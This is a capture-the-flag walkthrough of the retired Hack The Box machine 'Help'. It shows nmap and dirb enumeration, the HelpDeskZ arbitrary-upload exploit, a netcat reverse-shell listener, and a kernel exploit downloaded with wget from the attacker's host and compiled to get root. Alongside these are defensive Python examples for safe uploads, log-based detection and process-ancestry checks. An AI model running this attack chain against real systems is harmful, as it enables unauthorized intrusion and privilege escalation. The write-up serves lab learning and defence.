
Hack the Box - Help

๐Ÿ‘‹๐Ÿผ๐Ÿ‘‹๐Ÿผ Hello world! โœŒ๏ธ

Recently I've started rooting machines on Hack The Box (when I'm stressed xD) and have rooted some of the easy ones 😂. I found it fun and challenging. By the way, Help is now retired, so this is my walkthrough.

Information

  • OS: Linux
  • IP: 10.10.10.121
  • Difficulty: Easy

Enumeration

Nmap scan result:

# nmap -sV -sC -A -Pn 10.10.10.121
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-05 14:45 KST
Nmap scan report for 10.10.10.121
Host is up (0.31s latency).
Not shown: 995 closed ports
PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|_  256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
80/tcp    open     http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
1119/tcp  filtered bnetgame
3000/tcp  open     http     Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
25734/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.71 seconds

Seeing that port 80 was open, I opened http://10.10.10.121/ in a browser but didn't see anything interesting. It was just the default Apache page.

(Screenshot: Apache default page)

Then I opened http://10.10.10.121:3000/, which was also an HTTP service; it returned a JSON message.

{
  "message": "Hi Shiv, To get access please find the credentials with given query"
}

Directory scanning

I used dirb to scan for directories on port 80 and got this result.

# dirb http://10.10.10.121/ /usr/share/dirb/wordlists/small.txt

----------------
DIRB v2.22
By The Dark Raver
----------------

START_TIME: Wed Jun  5 05:24:13 2019
URL_BASE: http://10.10.10.121/
WORDLIST_FILES: /usr/share/dirb/wordlists/small.txt

----------------

GENERATED WORDS: 959

---- Scanning URL: http://10.10.10.121/ ----
==> DIRECTORY: http://10.10.10.121/javascript/
==> DIRECTORY: http://10.10.10.121/support/

---- Entering directory: http://10.10.10.121/javascript/ ----

---- Entering directory: http://10.10.10.121/support/ ----
==> DIRECTORY: http://10.10.10.121/support/css/
==> DIRECTORY: http://10.10.10.121/support/images/
==> DIRECTORY: http://10.10.10.121/support/includes/
==> DIRECTORY: http://10.10.10.121/support/js/
==> DIRECTORY: http://10.10.10.121/support/uploads/
==> DIRECTORY: http://10.10.10.121/support/views/

---- Entering directory: http://10.10.10.121/support/css/ ----

(!) FATAL: Too many errors connecting to host
(Possible cause: COULDNT CONNECT)

-----------------
END_TIME: Wed Jun  5 05:47:35 2019
DOWNLOADED: 3050 - FOUND: 0

Shell uploading

dirb aborted with an error (too many requests to the server, I guessed), but two directories in the result looked interesting.

I found a page with a form and a file upload, and I guessed that uploaded files would be stored in http://10.10.10.121/support/uploads/.

(Screenshot: HelpDeskZ)

I uploaded a PHP reverse shell and tried to find it in /support/uploads/, but the file name had been changed. I was about to Google HelpDeskZ when Google's suggestions already included the keyword "exploit", LoLz.

Oh, if you get the message "File is not allowed.", don't worry. The file was already uploaded before this message was shown. You can check the source code of its upload process here.
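That validate-after-write order is the whole problem: the extension check runs, but the file is already on disk in a web-served directory. As an added example (my own Python, not HelpDeskZ's PHP; the paths, sample data and allowlist are constructed for this illustration), here is the vulnerable pattern beside a handler that checks extension and content before writing anything and stores the file under a random name in a directory the web server does not serve:

```python
# Added example, not HelpDeskZ's own code. Compares an upload handler that
# validates *after* writing with one that validates first. All directories,
# names and sample data are constructed for this illustration.
import os
import secrets
import tempfile

ALLOWED_EXT = {".txt", ".pdf", ".png", ".jpg"}
# Leading bytes of the formats we accept; a ".png" starting with "<?php" is rejected.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
    ".txt": None,  # plain text has no magic; any bytes are accepted
}


def save_upload_insecure(filename, data, upload_dir):
    """Vulnerable pattern: write the file, then decide whether it was allowed.
    The caller sees 'File is not allowed.' but the file is still on disk."""
    path = os.path.join(upload_dir, os.path.basename(filename))
    with open(path, "wb") as fh:
        fh.write(data)
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, "File is not allowed."  # ...but it was already saved above
    return True, path


def save_upload_secure(filename, data, storage_dir):
    """Validate extension and content first, write nothing on failure, and store
    under a random name in a directory the web server never serves."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, "File is not allowed."
    magic = MAGIC[ext]
    if magic is not None and not data.startswith(magic):
        return False, "File content does not match its extension."
    # Random name: nothing derived from the client-supplied name or the clock,
    # so an uploaded file cannot be located by guessing.
    stored_name = secrets.token_hex(16) + ext
    path = os.path.join(storage_dir, stored_name)
    # O_EXCL: never overwrite an existing file; 0o600: not executable, owner-only.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return True, path


def demo():
    """Run both handlers on a constructed .php upload and report what is left on disk."""
    payload = b"<?php echo 'constructed test payload'; ?>"  # constructed sample
    results = {}
    with tempfile.TemporaryDirectory() as webroot, tempfile.TemporaryDirectory() as storage:
        ok, _ = save_upload_insecure("a.php", payload, webroot)
        results["insecure_accepted"] = ok
        results["insecure_left_on_disk"] = sorted(os.listdir(webroot))

        ok, _ = save_upload_secure("a.php", payload, storage)
        results["secure_accepted"] = ok
        results["secure_left_on_disk"] = sorted(os.listdir(storage))

        ok, path = save_upload_secure("note.png", MAGIC[".png"] + b"...", storage)
        results["png_accepted"] = ok
        results["png_name_is_random"] = os.path.basename(path) != "note.png"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The insecure handler rejects the upload and still leaves a.php in the web root; the secure one rejects it without touching the disk, and the accepted PNG gets a name unrelated to the original.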

(Screenshot: HelpDeskZ)

Then I used searchsploit instead of Google to search for its exploit.

# searchsploit helpdeskz
--------------------------------------------- ---------------------------------------
Exploit Title                               |  Path
| (/usr/share/exploitdb/)
--------------------------------------------- ---------------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload      | exploits/php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Autenticated) SQL Injec | exploits/php/webapps/41200.py
--------------------------------------------- ---------------------------------------
Shellcodes: No Result

Let's run the Python script.

# python /usr/share/exploitdb/exploits/php/webapps/40300.py
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
Usage: help.py [baseUrl] [nameOfUploadedFile]

Now run it again with the URL and the name of the uploaded PHP reverse shell. A short name makes the process faster, so I named it a.php.

# python /usr/share/exploitdb/exploits/php/webapps/40300.py http://10.10.10.121/support/uploads/tickets/ a.php

Because a.php is a reverse shell, I ran netcat -lvnp 1234 as the listener at the same time.
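From the defender's side, the script's search for the renamed upload is easy to spot: it requests candidate .php names under /support/uploads/tickets/ until one answers 200 instead of 404, which shows up in the Apache access log as a burst of 404s from a single client followed by a hit. The detection logic below is an added example, not part of the walkthrough or of the exploit script; the log lines are constructed, and the client IPs, timestamps and hex file names are made up:

```python
# Added example (not from the walkthrough): flag clients that probe for .php
# files under the upload directory. The log lines are constructed; IPs, times
# and file names are made up.
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
10.10.14.9 - - [05/Jun/2019:01:09:50 +0000] "GET /support/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.9 - - [05/Jun/2019:01:09:51 +0000] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Jun/2019:01:10:03 +0000] "GET /support/uploads/tickets/3f1a9c0e2b7d4a6c8e5f1b3d9a2c4e6f.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [05/Jun/2019:01:10:03 +0000] "GET /support/uploads/tickets/8b2d4f6a1c3e5a7b9d0f2c4e6a8b1d3f.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [05/Jun/2019:01:10:04 +0000] "GET /support/uploads/tickets/c4e6a8b1d3f5a7c9e2b4d6f8a1c3e5b7.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [05/Jun/2019:01:10:04 +0000] "GET /support/uploads/tickets/d5f7b9c1e3a5c7e9b2d4f6a8c1e3b5d7.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [05/Jun/2019:01:10:05 +0000] "GET /support/uploads/tickets/e6a8c1d3f5b7d9e2c4a6b8d1f3a5c7e9.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [05/Jun/2019:01:10:05 +0000] "GET /support/uploads/tickets/f7b9d2e4a6c8e1b3d5f7a9c2e4b6d8f1.php HTTP/1.1" 200 0 "-" "python-requests/2.21.0"
"""

# Apache "combined" format: client, ident, user, [timestamp], "METHOD path proto", status, ...
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
# Anything executable-looking under the upload tree (.php, .php5, .phtml, ...).
UPLOAD_SCRIPT_RE = re.compile(r'^/support/uploads/.*\.ph(p\d?|tml)$', re.IGNORECASE)


def parse_access_log(text):
    """Yield (client, timestamp, path, status) for each well-formed line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((m["client"], ts, m["path"], int(m["status"])))
    return events


def find_upload_enumeration(text, window=timedelta(seconds=60), min_misses=3):
    """Report clients that produced at least `min_misses` 404s for script files
    under the upload directory within `window`, and how many such requests
    were actually served (status 200)."""
    per_client = defaultdict(list)
    for client, ts, path, status in parse_access_log(text):
        if UPLOAD_SCRIPT_RE.match(path):
            per_client[client].append((ts, status))

    findings = []
    for client, reqs in sorted(per_client.items()):
        reqs.sort()
        misses = [ts for ts, st in reqs if st == 404]
        served = [ts for ts, st in reqs if st == 200]
        if len(misses) < min_misses:
            continue
        span = misses[-1] - misses[0]
        if span > window:
            continue
        findings.append({
            "client": client,
            "misses": len(misses),
            "served": len(served),
            "span_seconds": int(span.total_seconds()),
        })
    return findings


if __name__ == "__main__":
    for f in find_upload_enumeration(SAMPLE_LOG):
        print(f)
```

A `served` count above zero is the important part: the probing client eventually reached a script that the server executed, so the response is containment, not just blocking the source address.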

Spawned! Let's find the user flag.

# netcat -lvnp 1234
Connection from 10.10.10.121:48570
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
01:14:45 up  2:15,  1 user,  load average: 7.90, 13.13, 12.52
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
help     pts/1    10.10.12.240     23:59   29.00s  0.60s  0.60s -bash
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
help@help:/$ id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
help@help:/$ cd /home/help
help@help:/home/help$ ls -l
total 12
drwxrwxrwx 6 root root 4096 Jun  5 00:47 help
-rw-rw-r-- 1 help help  946 Nov 28  2018 npm-debug.log
-rw-r--r-- 1 root root   33 Nov 28  2018 user.txt
help@help:/home/help$ cat user.txt
cat user.txt
bb****************************af
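The shell above is a child of the web server: sh spawned by the Apache worker, then python to get a pty, then bash, and later gcc. On the host, that ancestry is the reliable signal, since a web server has no business running an interactive shell, an interpreter or a compiler. The host check below is an added example and not from the walkthrough; the ps snapshot it parses is constructed with made-up PIDs, and the lists of web-server and suspicious process names are my assumptions for this illustration:

```python
# Added example (not from the walkthrough): flag shells, interpreters and
# compilers whose ancestry includes a web server process. The ps snapshot is
# constructed; PIDs and command lines are made up for this illustration.

# Constructed output of: ps -eo pid,ppid,user,comm,args
SAMPLE_PS = """\
  PID  PPID USER     COMMAND  COMMAND
    1     0 root     systemd  /sbin/init
  900     1 root     apache2  /usr/sbin/apache2 -k start
  901   900 help     apache2  /usr/sbin/apache2 -k start
 1100     1 root     sshd     /usr/sbin/sshd -D
 1200  1100 help     bash     -bash
 1300     1 root     python3  /usr/bin/python3 /opt/backup/rotate.py
 1500   901 help     sh       /bin/sh
 1501  1500 help     python   python -c import pty;pty.spawn('/bin/bash')
 1502  1501 help     bash     /bin/bash
 1503  1502 help     gcc      gcc -o root upstream44.c
"""

# Assumed name sets for this illustration; extend for your own platform.
WEB_SERVERS = {"apache2", "httpd", "php-fpm", "nginx"}
SUSPECT = {"sh", "bash", "dash", "python", "python2", "python3", "perl",
           "nc", "netcat", "gcc", "cc", "wget", "curl"}


def parse_ps(text):
    """Build {pid: {pid, ppid, user, comm, args}} from a ps snapshot."""
    procs = {}
    for line in text.splitlines():
        parts = line.split(None, 4)          # args may contain spaces: keep them whole
        if len(parts) < 4 or not parts[0].isdigit():
            continue                          # header or malformed line
        pid, ppid, user, comm = int(parts[0]), int(parts[1]), parts[2], parts[3]
        args = parts[4] if len(parts) == 5 else ""
        procs[pid] = {"pid": pid, "ppid": ppid, "user": user, "comm": comm, "args": args}
    return procs


def ancestry(procs, pid):
    """Return [comm of pid, comm of its parent, ...] up to the root of the tree."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:   # `seen` guards against cyclic data
        seen.add(pid)
        chain.append(procs[pid]["comm"])
        pid = procs[pid]["ppid"]
    return chain


def find_web_spawned_processes(text):
    """List suspicious processes that have a web server somewhere above them."""
    procs = parse_ps(text)
    findings = []
    for pid, p in sorted(procs.items()):
        if p["comm"] not in SUSPECT:
            continue
        chain = ancestry(procs, pid)
        if any(c in WEB_SERVERS for c in chain[1:]):
            findings.append({
                "pid": pid,
                "user": p["user"],
                "comm": p["comm"],
                "chain": " <- ".join(chain),
            })
    return findings


if __name__ == "__main__":
    for f in find_web_spawned_processes(SAMPLE_PS):
        print(f"pid {f['pid']:>5} {f['user']:<6} {f['comm']:<8} {f['chain']}")
```

The ssh-spawned bash (1200) and the cron-style python3 (1300) are not reported; only the chain hanging off the Apache worker is. The `user` field matters too: here the worker and the shell run as `help`, so the web server's account, not just www-data, is what an attacker inherits.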

Get access to Root

I checked the kernel version of the machine and searched for an exploit.

help@help:/home/help$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

I found this exploit, and it worked on this machine's kernel version.

help@help:/home/help$ wget http://10.10.12.126:3000/files/upstream44.c
--2019-06-05 01:19:38--  http://10.10.12.126:3000/files/upstream44.c
Connecting to 10.10.12.126:3000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5776 (5.6K) [text/x-c]
Saving to: 'upstream44.c'

upstream44.c        100%[===================>]   5.64K  15.5KB/s    in 0.4s    

2019-06-05 01:19:40 (15.5 KB/s) - 'upstream44.c' saved [5776/5776]

help@help:/home/help$ gcc -o root upstream44.c
help@help:/home/help$ ./root
task_struct = ffff880007e9e200
uidptr = ffff880007f23384
spawning root shell
root@help:/home/help# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
root@help:/home/help# cat /root/root.txt
b7****************************98

Rooted! I hope you enjoyed this ^^
